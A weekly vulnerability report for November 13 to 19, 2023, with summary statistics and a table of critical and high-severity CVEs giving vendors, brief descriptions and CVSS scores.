Weekly Vulnerabilities Reports > November 13 to 19, 2023

Overview

724 new vulnerabilities reported during this period, including 66 critical vulnerabilities and 335 high severity vulnerabilities. This weekly summary report vulnerabilities in 1890 products from 274 vendors including Intel, Adobe, Microsoft, AMD, and Siemens. Vulnerabilities are notably categorized as "Cross-site Scripting", "Cross-Site Request Forgery (CSRF)", "Out-of-bounds Read", "Out-of-bounds Write", and "SQL Injection".

  • 472 reported vulnerabilities are remotely exploitables.
  • 183 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 411 reported vulnerabilities are exploitable by an anonymous user.
  • Intel has the most reported vulnerabilities, with 100 reported vulnerabilities.
  • Silabs has the most reported critical vulnerabilities, with 6 reported vulnerabilities.

TOTAL
VULNERABILITIES
CRITICAL RISK
VULNERABILITIES
HIGH RISK
VULNERABILITIES
MEDIUM RISK
VULNERABILITIES
LOW RISK
VULNERABILITIES
REMOTELY
EXPLOITABLE
LOCALLY
EXPLOITABLE
EXPLOIT
AVAILABLE
EXPLOITABLE
ANONYMOUSLY
AFFECTING
WEB APPLICATION

Vulnerability Details

The following table list reported vulnerabilities for the period covered by this report:

Expand/Hide

66 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-15 CVE-2023-48365 Qlik HTTP Request Smuggling vulnerability in Qlik Sense

Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683.

9.9
2023-11-18 CVE-2023-4214 Apppresser Weak Password Recovery Mechanism for Forgotten Password vulnerability in Apppresser

The AppPresser plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 4.2.5.

9.8
2023-11-18 CVE-2023-43177 Crushftp Improper Control of Dynamically-Managed Code Resources vulnerability in Crushftp

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

9.8
2023-11-18 CVE-2023-48028 Kodcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Kodcloud Kodbox 1.46.01

kodbox 1.46.01 has a security flaw that enables user enumeration.

9.8
2023-11-17 CVE-2023-6188 GET Simple Code Injection vulnerability in Get-Simple Getsimplecms 3.3.16/3.4.0A

A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a.

9.8
2023-11-17 CVE-2023-44350 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution.

9.8
2023-11-17 CVE-2023-44351 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution.

9.8
2023-11-17 CVE-2023-44353 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution.

9.8
2023-11-17 CVE-2023-44324 Adobe Improper Authentication vulnerability in Adobe Framemaker Publishing Server 2020/2022

Adobe FrameMaker Publishing Server versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass.

9.8
2023-11-17 CVE-2023-38316 Opennds Improper Encoding or Escaping of Output vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

9.8
2023-11-17 CVE-2023-41101 Opennds Out-of-bounds Write vulnerability in Opennds

An issue was discovered in the captive portal in OpenNDS before version 10.1.3.

9.8
2023-11-17 CVE-2023-48655 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48656 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48657 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48658 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48659 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48648 Concretecms Incorrect Default Permissions vulnerability in Concretecms Concrete CMS

Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows unauthorized access because directories can be created with insecure permissions.

9.8
2023-11-17 CVE-2023-45387 Myprestamodules SQL Injection vulnerability in Myprestamodules Exportproducts

In the module "Product Catalog (CSV, Excel, XML) Export PRO" (exportproducts) in versions up to 5.0.0 from MyPrestaModules for PrestaShop, a guest can perform SQL injection via `exportProduct::_addDataToDb().`

9.8
2023-11-17 CVE-2023-48031 Opensupports Unrestricted Upload of File with Dangerous Type vulnerability in Opensupports 4.11.0

OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type.

9.8
2023-11-17 CVE-2023-48078 Code Projects SQL Injection vulnerability in Code-Projects Simple Crud Functionality 1.0

SQL Injection vulnerability in add.php in Simple CRUD Functionality v1.0 allows attackers to run arbitrary SQL commands via the 'title' parameter.

9.8
2023-11-16 CVE-2023-6014 Lfprojects Unspecified vulnerability in Lfprojects Mlflow

An attacker is able to arbitrarily create an account in MLflow bypassing any authentication requirment.

9.8
2023-11-16 CVE-2023-6019 RAY Project OS Command Injection vulnerability in RAY Project RAY

A command injection existed in Ray's cpu_profile URL parameter allowing attackers to execute os commands on the system running the ray dashboard remotely without authentication.

9.8
2023-11-16 CVE-2023-6016 H2O Unspecified vulnerability in H2O

An attacker is able to gain remote code execution on a server hosting the H2O dashboard through it's POJO model import feature.

9.8
2023-11-16 CVE-2023-6018 Lfprojects OS Command Injection vulnerability in Lfprojects Mlflow

An attacker can overwrite any file on the server hosting MLflow without any authentication.

9.8
2023-11-16 CVE-2023-47213 C First Use of Hard-coded Credentials vulnerability in C-First products

First Corporation's DVRs use a hard-coded password, which may allow a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device.

9.8
2023-11-16 CVE-2023-47674 C First Missing Authentication for Critical Function vulnerability in C-First products

Missing authentication for critical function vulnerability in First Corporation's DVRs allows a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device.

9.8
2023-11-16 CVE-2021-35437 Lmxcms SQL Injection vulnerability in Lmxcms 1.4

SQL injection vulnerability in LMXCMS v.1.4 allows attacker to execute arbitrary code via the TagsAction.class.

9.8
2023-11-16 CVE-2023-47003 Redislabs NULL Pointer Dereference vulnerability in Redislabs Redisgraph 2.12.10

An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.

9.8
2023-11-15 CVE-2023-41442 Kloudq Improper Authentication vulnerability in Kloudq products

An issue in Kloudq Technologies Limited Tor Equip 1.0, Tor Loco Mini 1.0 through 3.1 allows a remote attacker to execute arbitrary code via a crafted request to the MQTT component.

9.8
2023-11-15 CVE-2023-5245 Combust Path Traversal vulnerability in Combust Mleap 0.18.0/0.23.0

FileUtil.extract() enumerates all zip file entries and extracts each file without validating whether file paths in the archive are outside the intended directory. When creating an instance of TensorflowModel using the saved_model format and an exported tensorflow model, the apply() function invokes the vulnerable implementation of FileUtil.extract(). Arbitrary file creation can directly lead to code execution

9.8
2023-11-15 CVE-2023-47445 Phpgurukul SQL Injection vulnerability in PHPgurukul Pre-School Enrollment System 1.0

Pre-School Enrollment version 1.0 is vulnerable to SQL Injection via the username parameter in preschool/admin/ page.

9.8
2023-11-15 CVE-2023-43979 Prestahero SQL Injection vulnerability in Prestahero YBC Blog

ETS Soft ybc_blog before v4.4.0 was discovered to contain a SQL injection vulnerability via the component Ybc_blogBlogModuleFrontController::getPosts().

9.8
2023-11-15 CVE-2023-47308 Activedesign SQL Injection vulnerability in Activedesign Newsletterpop

In the module "Newsletter Popup PRO with Voucher/Coupon code" (newsletterpop) before version 2.6.1 from Active Design for PrestaShop, a guest can perform SQL injection in affected versions.

9.8
2023-11-15 CVE-2023-39335 Ivanti Unspecified vulnerability in Ivanti Endpoint Manager Mobile

A security vulnerability has been identified in EPMM Versions 11.10, 11.9 and 11.8 and older allowing an unauthenticated threat actor to impersonate any existing user during the device enrollment process.

9.8
2023-11-14 CVE-2023-45614 Arubanetworks
HP
Classic Buffer Overflow vulnerability in multiple products

There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-45615 Arubanetworks
HP
Classic Buffer Overflow vulnerability in multiple products

There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-45616 Arubanetworks
HP
Classic Buffer Overflow vulnerability in multiple products

There is a buffer overflow vulnerability in the underlying AirWave client service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-34060 Vmware Missing Authentication for Critical Function vulnerability in VMWare Cloud Director

VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console) .

9.8
2023-11-14 CVE-2023-36049 Microsoft Unspecified vulnerability in Microsoft .Net and .Net Framework

.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability

9.8
2023-11-14 CVE-2023-47130 Yiiframework Deserialization of Untrusted Data vulnerability in Yiiframework YII

Yii is an open source PHP web framework.

9.8
2023-11-14 CVE-2022-23820 AMD Improper Input Validation vulnerability in AMD products

Failure to validate the AMD SMM communication buffer may allow an attacker to corrupt the SMRAM potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2022-23821 AMD Unspecified vulnerability in AMD products

Improper access control in System Management Mode (SMM) may allow an attacker to write to SPI ROM potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2023-20596 AMD Unspecified vulnerability in AMD products

Improper input validation in the SMM Supervisor may allow an attacker with a compromised SMI handler to gain Ring0 access potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2023-31273 Intel Improper Privilege Management vulnerability in Intel Data Center Manager

Protection mechanism failure in some Intel DCM software before version 5.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

9.8
2023-11-14 CVE-2023-34991 Fortinet SQL Injection vulnerability in Fortinet Fortiwlm

A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.0 through 8.4.2 and 8.3.0 through 8.3.2 and 8.2.2 allows attacker to execute unauthorized code or commands via a crafted http request.

9.8
2023-11-14 CVE-2023-36018 Microsoft Unspecified vulnerability in Microsoft Jupyter 2022.9.110

Visual Studio Code Jupyter Extension Spoofing Vulnerability

9.8
2023-11-14 CVE-2023-36028 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability

9.8
2023-11-14 CVE-2023-36397 Microsoft Unspecified vulnerability in Microsoft products

Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

9.8
2023-11-14 CVE-2023-36553 Fortinet OS Command Injection vulnerability in Fortinet Fortisiem

A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiSIEM version 5.4.0 and 5.3.0 through 5.3.3 and 5.2.5 through 5.2.8 and 5.2.1 through 5.2.2 and 5.1.0 through 5.1.3 and 5.0.0 through 5.0.1 and 4.10.0 and 4.9.0 and 4.7.2 allows attacker to execute unauthorized code or commands via crafted API requests.

9.8
2023-11-14 CVE-2023-6126 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

9.8
2023-11-14 CVE-2023-43504 Siemens Classic Buffer Overflow vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions < V10.4.4).

9.8
2023-11-14 CVE-2023-24585 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

An out-of-bounds write vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-25181 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

A heap-based buffer overflow vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-27882 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

A heap-based buffer overflow vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-28379 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-28391 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server header parsing functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-31247 Weston Embedded
Silabs
Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server Host header parsing functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-45878 Gibbonedu Unspecified vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication.

9.8
2023-11-14 CVE-2023-43902 Emsigner Unspecified vulnerability in Emsigner 2.8.7

Incorrect access control in the Forgot Your Password function of EMSigner v2.8.7 allows unauthenticated attackers to access accounts of all registered users, including those with administrator privileges via a crafted password reset token.

9.8
2023-11-13 CVE-2023-6102 Maiwei Safety Production Control Platform Project Unrestricted Upload of File with Dangerous Type vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability, which was classified as problematic, was found in Maiwei Safety Production Control Platform 4.1.

9.8
2023-11-13 CVE-2023-6099 Szjocat Improper Privilege Management vulnerability in Szjocat Facial Love Cloud Platform 1.0.55.0.0.1

A vulnerability classified as critical has been found in Shenzhen Youkate Industrial Facial Love Cloud Payment System up to 1.0.55.0.0.1.

9.8
2023-11-15 CVE-2023-48224 Ethyca Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Ethyca Fides

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code.

9.1
2023-11-15 CVE-2023-47678 Asus Unspecified vulnerability in Asus Rt-Ac87U Firmware

An improper access control vulnerability exists in RT-AC87U all versions.

9.1
2023-11-15 CVE-2023-39337 Ivanti Unspecified vulnerability in Ivanti Endpoint Manager Mobile

A security vulnerability in EPMM Versions 11.10, 11.9 and 11.8 older allows a threat actor with knowledge of an enrolled device identifier to access and extract sensitive information, including device and environment configuration details, as well as secrets.

9.1
2023-11-14 CVE-2023-25603 Fortinet Overly Permissive Cross-domain Whitelist vulnerability in Fortinet Fortiadc and Fortiddos-F

A permissive cross-domain policy with untrusted domains vulnerability in Fortinet FortiADC 7.1.0 - 7.1.1, FortiDDoS-F 6.3.0 - 6.3.4 and 6.4.0 - 6.4.1 allow an unauthorized attacker to carry out privileged actions and retrieve sensitive information via crafted web requests.

9.1
2023-11-14 CVE-2023-44373 Siemens Injection vulnerability in Siemens products

Affected devices do not properly sanitize an input field.

9.1

335 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-18 CVE-2023-25985 Tooltips Unspecified vulnerability in Tooltips Wordpress Tooltips

Cross-Site Request Forgery (CSRF) vulnerability in Tomas | Docs | FAQ | Premium Support WordPress Tooltips.This issue affects WordPress Tooltips: from n/a through 8.2.5.

8.8
2023-11-18 CVE-2023-28780 Yoast Cross-Site Request Forgery (CSRF) vulnerability in Yoast Local SEO

Cross-Site Request Forgery (CSRF) vulnerability in Yoast Yoast Local Premium.This issue affects Yoast Local Premium: from n/a through 14.8.

8.8
2023-11-18 CVE-2023-31075 Ciphercoin Cross-Site Request Forgery (CSRF) vulnerability in Ciphercoin Easy Hide Login 1.0.8

Cross-Site Request Forgery (CSRF) vulnerability in Arshid Easy Hide Login.This issue affects Easy Hide Login: from n/a through 1.0.8.

8.8
2023-11-18 CVE-2023-31089 Webternsolutions Cross-Site Request Forgery (CSRF) vulnerability in Webternsolutions Video XML Sitemap Generator

Cross-Site Request Forgery (CSRF) vulnerability in Tradebooster Video XML Sitemap Generator.This issue affects Video XML Sitemap Generator: from n/a through 1.0.0.

8.8
2023-11-18 CVE-2023-32245 Wpdeveloper Cross-Site Request Forgery (CSRF) vulnerability in Wpdeveloper Essential Addons for Elementor 5.4.8

Cross-Site Request Forgery (CSRF) vulnerability in WPDeveloper Essential Addons for Elementor Pro.This issue affects Essential Addons for Elementor Pro: from n/a through 5.4.8.

8.8
2023-11-18 CVE-2023-32504 Kaine Cross-Site Request Forgery (CSRF) vulnerability in Kaine Wise Chat

Cross-Site Request Forgery (CSRF) vulnerability in Kainex Wise Chat.This issue affects Wise Chat: from n/a through 3.1.3.

8.8
2023-11-18 CVE-2023-32514 Himanshuparashar Cross-Site Request Forgery (CSRF) vulnerability in Himanshuparashar Google Site Verification Plugin Using Meta TAG 1.2

Cross-Site Request Forgery (CSRF) vulnerability in Himanshu Parashar Google Site Verification plugin using Meta Tag.This issue affects Google Site Verification plugin using Meta Tag: from n/a through 1.2.

8.8
2023-11-18 CVE-2023-41129 Patreon Unspecified vulnerability in Patreon Wordpress

Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress.This issue affects Patreon WordPress: from n/a through 1.8.6.

8.8
2023-11-18 CVE-2023-47243 Codemshop Cross-Site Request Forgery (CSRF) vulnerability in Codemshop Mshop MY Site 1.1.6

Cross-Site Request Forgery (CSRF) vulnerability in CodeMShop ???? ????? – MSHOP MY SITE.This issue affects ???? ????? – MSHOP MY SITE: from n/a through 1.1.6.

8.8
2023-11-18 CVE-2023-47519 Wcproducttable Cross-Site Request Forgery (CSRF) vulnerability in Wcproducttable Woocommerce Product Table Lite

Cross-Site Request Forgery (CSRF) vulnerability in WC Product Table WooCommerce Product Table Lite.This issue affects WooCommerce Product Table Lite: from n/a through 2.6.2.

8.8
2023-11-18 CVE-2023-47531 Droitthemes Cross-Site Request Forgery (CSRF) vulnerability in Droitthemes Droit Dark Mode

Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Dark Mode.This issue affects Droit Dark Mode: from n/a through 1.1.2.

8.8
2023-11-18 CVE-2023-47551 Rednao Cross-Site Request Forgery (CSRF) vulnerability in Rednao Donations Made Easy - Smart Donations

Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations.This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

8.8
2023-11-18 CVE-2023-47552 Webdevocean Cross-Site Request Forgery (CSRF) vulnerability in Webdevocean Image Hover Effects 5.3

Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Image Hover Effects – WordPress Plugin.This issue affects Image Hover Effects – WordPress Plugin: from n/a through 5.5.

8.8
2023-11-18 CVE-2023-47553 Userlocal Cross-Site Request Forgery (CSRF) vulnerability in Userlocal Userheat Plugin

Cross-Site Request Forgery (CSRF) vulnerability in User Local Inc UserHeat Plugin.This issue affects UserHeat Plugin: from n/a through 1.1.6.

8.8
2023-11-18 CVE-2023-47556 Jamesmehorter Cross-Site Request Forgery (CSRF) vulnerability in Jamesmehorter Device Theme Switcher

Cross-Site Request Forgery (CSRF) vulnerability in James Mehorter Device Theme Switcher.This issue affects Device Theme Switcher: from n/a through 3.0.2.

8.8
2023-11-18 CVE-2023-47644 Metagauss Cross-Site Request Forgery (CSRF) vulnerability in Metagauss Profilegrid

Cross-Site Request Forgery (CSRF) vulnerability in profilegrid ProfileGrid – User Profiles, Memberships, Groups and Communities.This issue affects ProfileGrid – User Profiles, Memberships, Groups and Communities: from n/a through 5.6.6.

8.8
2023-11-18 CVE-2023-47649 Pricelisto Cross-Site Request Forgery (CSRF) vulnerability in Pricelisto Best Restaurant Menu

Cross-Site Request Forgery (CSRF) vulnerability in PriceListo Best Restaurant Menu by PriceListo.This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.3.1.

8.8
2023-11-18 CVE-2023-47650 Petersterling Unspecified vulnerability in Petersterling ADD Local Avatar

Cross-Site Request Forgery (CSRF) vulnerability in Peter Sterling Add Local Avatar.This issue affects Add Local Avatar: from n/a through 12.1.

8.8
2023-11-18 CVE-2023-47651 Wplinkspage Unspecified vulnerability in Wplinkspage WP Links Page

Cross-Site Request Forgery (CSRF) vulnerability in Robert Macchi WP Links Page.This issue affects WP Links Page: from n/a through 4.9.4.

8.8
2023-11-18 CVE-2023-47655 Wpgov Cross-Site Request Forgery (CSRF) vulnerability in Wpgov Anac XML Bandi DI Gara

Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi ANAC XML Bandi di Gara.This issue affects ANAC XML Bandi di Gara: from n/a through 7.5.

8.8
2023-11-18 CVE-2023-47664 Plainviewplugins Cross-Site Request Forgery (CSRF) vulnerability in Plainviewplugins Plainview Protect Passwords

Cross-Site Request Forgery (CSRF) vulnerability in edward_plainview Plainview Protect Passwords.This issue affects Plainview Protect Passwords: from n/a through 1.4.

8.8
2023-11-18 CVE-2023-47666 Code Snippets Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Code Snippets

Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Pro Code Snippets.This issue affects Code Snippets: from n/a through 3.5.0.

8.8
2023-11-18 CVE-2023-47667 Paymentsplugin Cross-Site Request Forgery (CSRF) vulnerability in Paymentsplugin WP Full Stripe Free 1.6.1

Cross-Site Request Forgery (CSRF) vulnerability in Mammothology WP Full Stripe Free.This issue affects WP Full Stripe Free: from n/a through 7.0.16.

8.8
2023-11-18 CVE-2023-47670 Icansoft Cross-Site Request Forgery (CSRF) vulnerability in Icansoft Korea SNS

Cross-Site Request Forgery (CSRF) vulnerability in Jongmyoung Kim Korea SNS.This issue affects Korea SNS: from n/a through 1.6.3.

8.8
2023-11-18 CVE-2023-47671 Gopiplus Cross-Site Request Forgery (CSRF) vulnerability in Gopiplus Vertical Scroll Recent Registered User

Cross-Site Request Forgery (CSRF) vulnerability in Gopi Ramasamy Vertical scroll recent.This issue affects Vertical scroll recent post: from n/a through 14.0.

8.8
2023-11-18 CVE-2023-47672 Swashata Cross-Site Request Forgery (CSRF) vulnerability in Swashata WP Category Post List Widget 2.0.3

Cross-Site Request Forgery (CSRF) vulnerability in Swashata WP Category Post List Widget.This issue affects WP Category Post List Widget: from n/a through 2.0.3.

8.8
2023-11-18 CVE-2023-47685 NKB BD Cross-Site Request Forgery (CSRF) vulnerability in Nkb-Bd Preloader Matrix

Cross-Site Request Forgery (CSRF) vulnerability in Lukman Nakib Preloader Matrix.This issue affects Preloader Matrix: from n/a through 2.0.1.

8.8
2023-11-18 CVE-2023-48017 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer_cms 4.1.3 is vulnerable to Cross Site Request Forgery (CSRF) via Add permissions to CSRF in Permission Management.

8.8
2023-11-18 CVE-2023-6187 Strangerstudios Unrestricted Upload of File with Dangerous Type vulnerability in Strangerstudios Paid Memberships PRO

The Paid Memberships Pro plugin for WordPress is vulnerable to arbitrary file uploads to insufficient file type validation in the 'pmpro_paypalexpress_session_vars_for_user_fields' function in versions up to, and including, 2.12.3.

8.8
2023-11-17 CVE-2023-47757 Aweber Cross-Site Request Forgery (CSRF) vulnerability in Aweber

Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in AWeber AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth allows Accessing Functionality Not Properly Constrained by ACLs, Cross-Site Request Forgery.This issue affects AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth: from n/a through 7.3.9.

8.8
2023-11-17 CVE-2023-39544 NEC Missing Authorization vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allows a attacker to log in to the product may execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39545 NEC Files or Directories Accessible to External Parties vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allows a attacker to log in to the product may execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39546 NEC Unspecified vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allows a attacker to log in to the product may execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39547 NEC Authentication Bypass by Capture-replay vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allows a attacker to log in to the product may execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39548 NEC Unrestricted Upload of File with Dangerous Type vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allows a attacker to log in to the product may execute an arbitrary command.

8.8
2023-11-16 CVE-2023-47686 Kibokolabs Cross-Site Request Forgery (CSRF) vulnerability in Kibokolabs Arigato Autoresponder and Newsletter

Cross-Site Request Forgery (CSRF) vulnerability in Kiboko Labs Arigato Autoresponder and Newsletter plugin <= 2.7.2.2 versions.

8.8
2023-11-16 CVE-2023-47687 Vjinfotech Cross-Site Request Forgery (CSRF) vulnerability in Vjinfotech WOO Custom and Sequential Order Number

Cross-Site Request Forgery (CSRF) vulnerability in VJInfotech Woo Custom and Sequential Order Number plugin <= 2.6.0 versions.

8.8
2023-11-16 CVE-2023-47688 Alexufo Cross-Site Request Forgery (CSRF) vulnerability in Alexufo Youtube Speedload

Cross-Site Request Forgery (CSRF) vulnerability in Alexufo Youtube SpeedLoad plugin <= 0.6.3 versions.

8.8
2023-11-16 CVE-2023-46214 Splunk XML Injection (aka Blind XPath Injection) vulnerability in Splunk Cloud and Splunk

In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply.

8.8
2023-11-16 CVE-2023-6022 Prefect Cross-Site Request Forgery (CSRF) vulnerability in Prefect

Cross-Site Request Forgery (CSRF) in GitHub repository prefecthq/prefect prior to 2.16.5.

8.8
2023-11-16 CVE-2023-43275 Dedecms Cross-Site Request Forgery (CSRF) vulnerability in Dedecms 5.7

Cross-Site Request Forgery (CSRF) vulnerability in DedeCMS v5.7 in 110 backend management interface via /catalog_add.php, allows attackers to create crafted web pages due to a lack of verification of the token value of the submitted form.

8.8
2023-11-15 CVE-2023-47444 Opencart Code Injection vulnerability in Opencart 4.0.0.0

An issue discovered in OpenCart 4.0.0.0 to 4.0.2.3 allows authenticated backend users having common/security write privilege can write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server.

8.8
2023-11-15 CVE-2023-47637 Pimcore SQL Injection vulnerability in Pimcore

Pimcore is an Open Source Data & Experience Management Platform.

8.8
2023-11-15 CVE-2023-5997 Google
Fedoraproject
Debian
Use After Free vulnerability in multiple products

Use after free in Garbage Collection in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-15 CVE-2023-6112 Google
Debian
Fedoraproject
Use After Free vulnerability in multiple products

Use after free in Navigation in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-15 CVE-2023-48089 Xuxueli Unspecified vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save.

8.8
2023-11-15 CVE-2023-40923 Myprestamodules SQL Injection vulnerability in Myprestamodules Orders (Csv, Excel) Export

MyPrestaModules ordersexport before v5.0 was discovered to contain multiple SQL injection vulnerabilities at send.php via the key and save_setting parameters.

8.8
2023-11-15 CVE-2023-43582 Zoom Improper Authentication vulnerability in Zoom products

Improper authorization in some Zoom clients may allow an authorized user to conduct an escalation of privilege via network access.

8.8
2023-11-14 CVE-2022-45781 Tenda Out-of-bounds Write vulnerability in Tenda Ax1803 Firmware 1.0.0.1/1.0.0.12890

Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

8.8
2023-11-14 CVE-2023-48217 Statamic Unrestricted Upload of File with Dangerous Type vulnerability in Statamic

Statamic is a flat-first, Laravel + Git powered CMS designed for building websites.

8.8
2023-11-14 CVE-2023-36437 Microsoft Unspecified vulnerability in Microsoft Azure Pipelines Agent

Azure DevOps Server Remote Code Execution Vulnerability

8.8
